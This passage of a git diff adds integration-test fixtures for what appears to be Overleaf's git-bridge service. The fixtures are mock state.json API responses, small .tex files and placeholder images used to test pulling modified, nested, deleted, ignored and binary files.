"jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3864/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..933682f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +added more stuff diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest1.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest1.tex new file mode 100644 index 0000000..487d7bb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest1.tex @@ -0,0 +1 @@ +nest1 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest2/nest2.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest2/nest2.tex new file mode 100644 index 0000000..e333378 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest2/nest2.tex @@ -0,0 +1 @@ +nest2 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/state.json new file mode 100644 index 0000000..5bdb082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/state.json @@ -0,0 +1,80 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i added nested stuff", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\nadded more stuff\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + }, + { + "content": "nest1", + "path": "nest1/nest1.tex" + }, + { + "content": "nest2", + "path": "nest1/nest2/nest2.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3864/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3864/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/state.json new file mode 100644 index 0000000..ffbc946 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3859/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..933682f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +added more stuff diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..1578584 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. and modified \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/state.json new file mode 100644 index 0000000..afcd359 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/state.json @@ -0,0 +1,72 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted test.tex", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\nadded more stuff\n", + "path": "main.tex" + }, + { + "content": "This text is from another file. and modified", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3859/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3859/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest1.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest1.tex new file mode 100644 index 0000000..487d7bb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest1.tex @@ -0,0 +1 @@ +nest1 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest2/nest2.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest2/nest2.tex new file mode 100644 index 0000000..e333378 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest2/nest2.tex @@ -0,0 +1 @@ +nest2 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/state.json new file mode 100644 index 0000000..e4b4e85 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/state.json @@ -0,0 +1,54 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + }, + { + "content": "nest1", + "path": "nest1/nest1.tex" + }, + { + "content": "nest2", + "path": "nest1/nest2/nest2.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3865/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json new file mode 100644 index 0000000..f1c61fd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json @@ -0,0 +1,80 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted nested stuff", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3865/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + }, + { + "content": "nest1", + "path": "nest1/nest1.tex" + }, + { + "content": "nest2", + "path": "nest1/nest2/nest2.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3865/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/sub/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/sub/.gitignore new file mode 100644 index 0000000..2211df6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/sub/.gitignore @@ -0,0 +1 @@ +*.txt diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/state.json new file mode 100644 index 0000000..34de094 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/state.json @@ -0,0 +1,41 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "init", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "*.txt", + "path": "sub/.gitignore" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..3aa9d51 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +updated diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/sub/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/sub/.gitignore new file mode 100644 index 0000000..2211df6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/sub/.gitignore @@ -0,0 +1 @@ +*.txt diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json new file mode 100644 index 0000000..7e7b5d9 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json @@ -0,0 +1,45 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 5, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 5, + "comment": "init", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 5, + "srcs": [ + { + "content": "content\nupdated\n", + "path": "main.tex" + }, + { + "content": "*.txt", + "path": "sub/.gitignore" + }, + { + "content": "1", + "path": "sub/one.txt" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 5 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410-copy.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410-copy.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/state.json new file mode 100644 index 0000000..fbe4670 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/state.json @@ -0,0 +1,50 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + }, + { + "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410-copy.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/main.tex 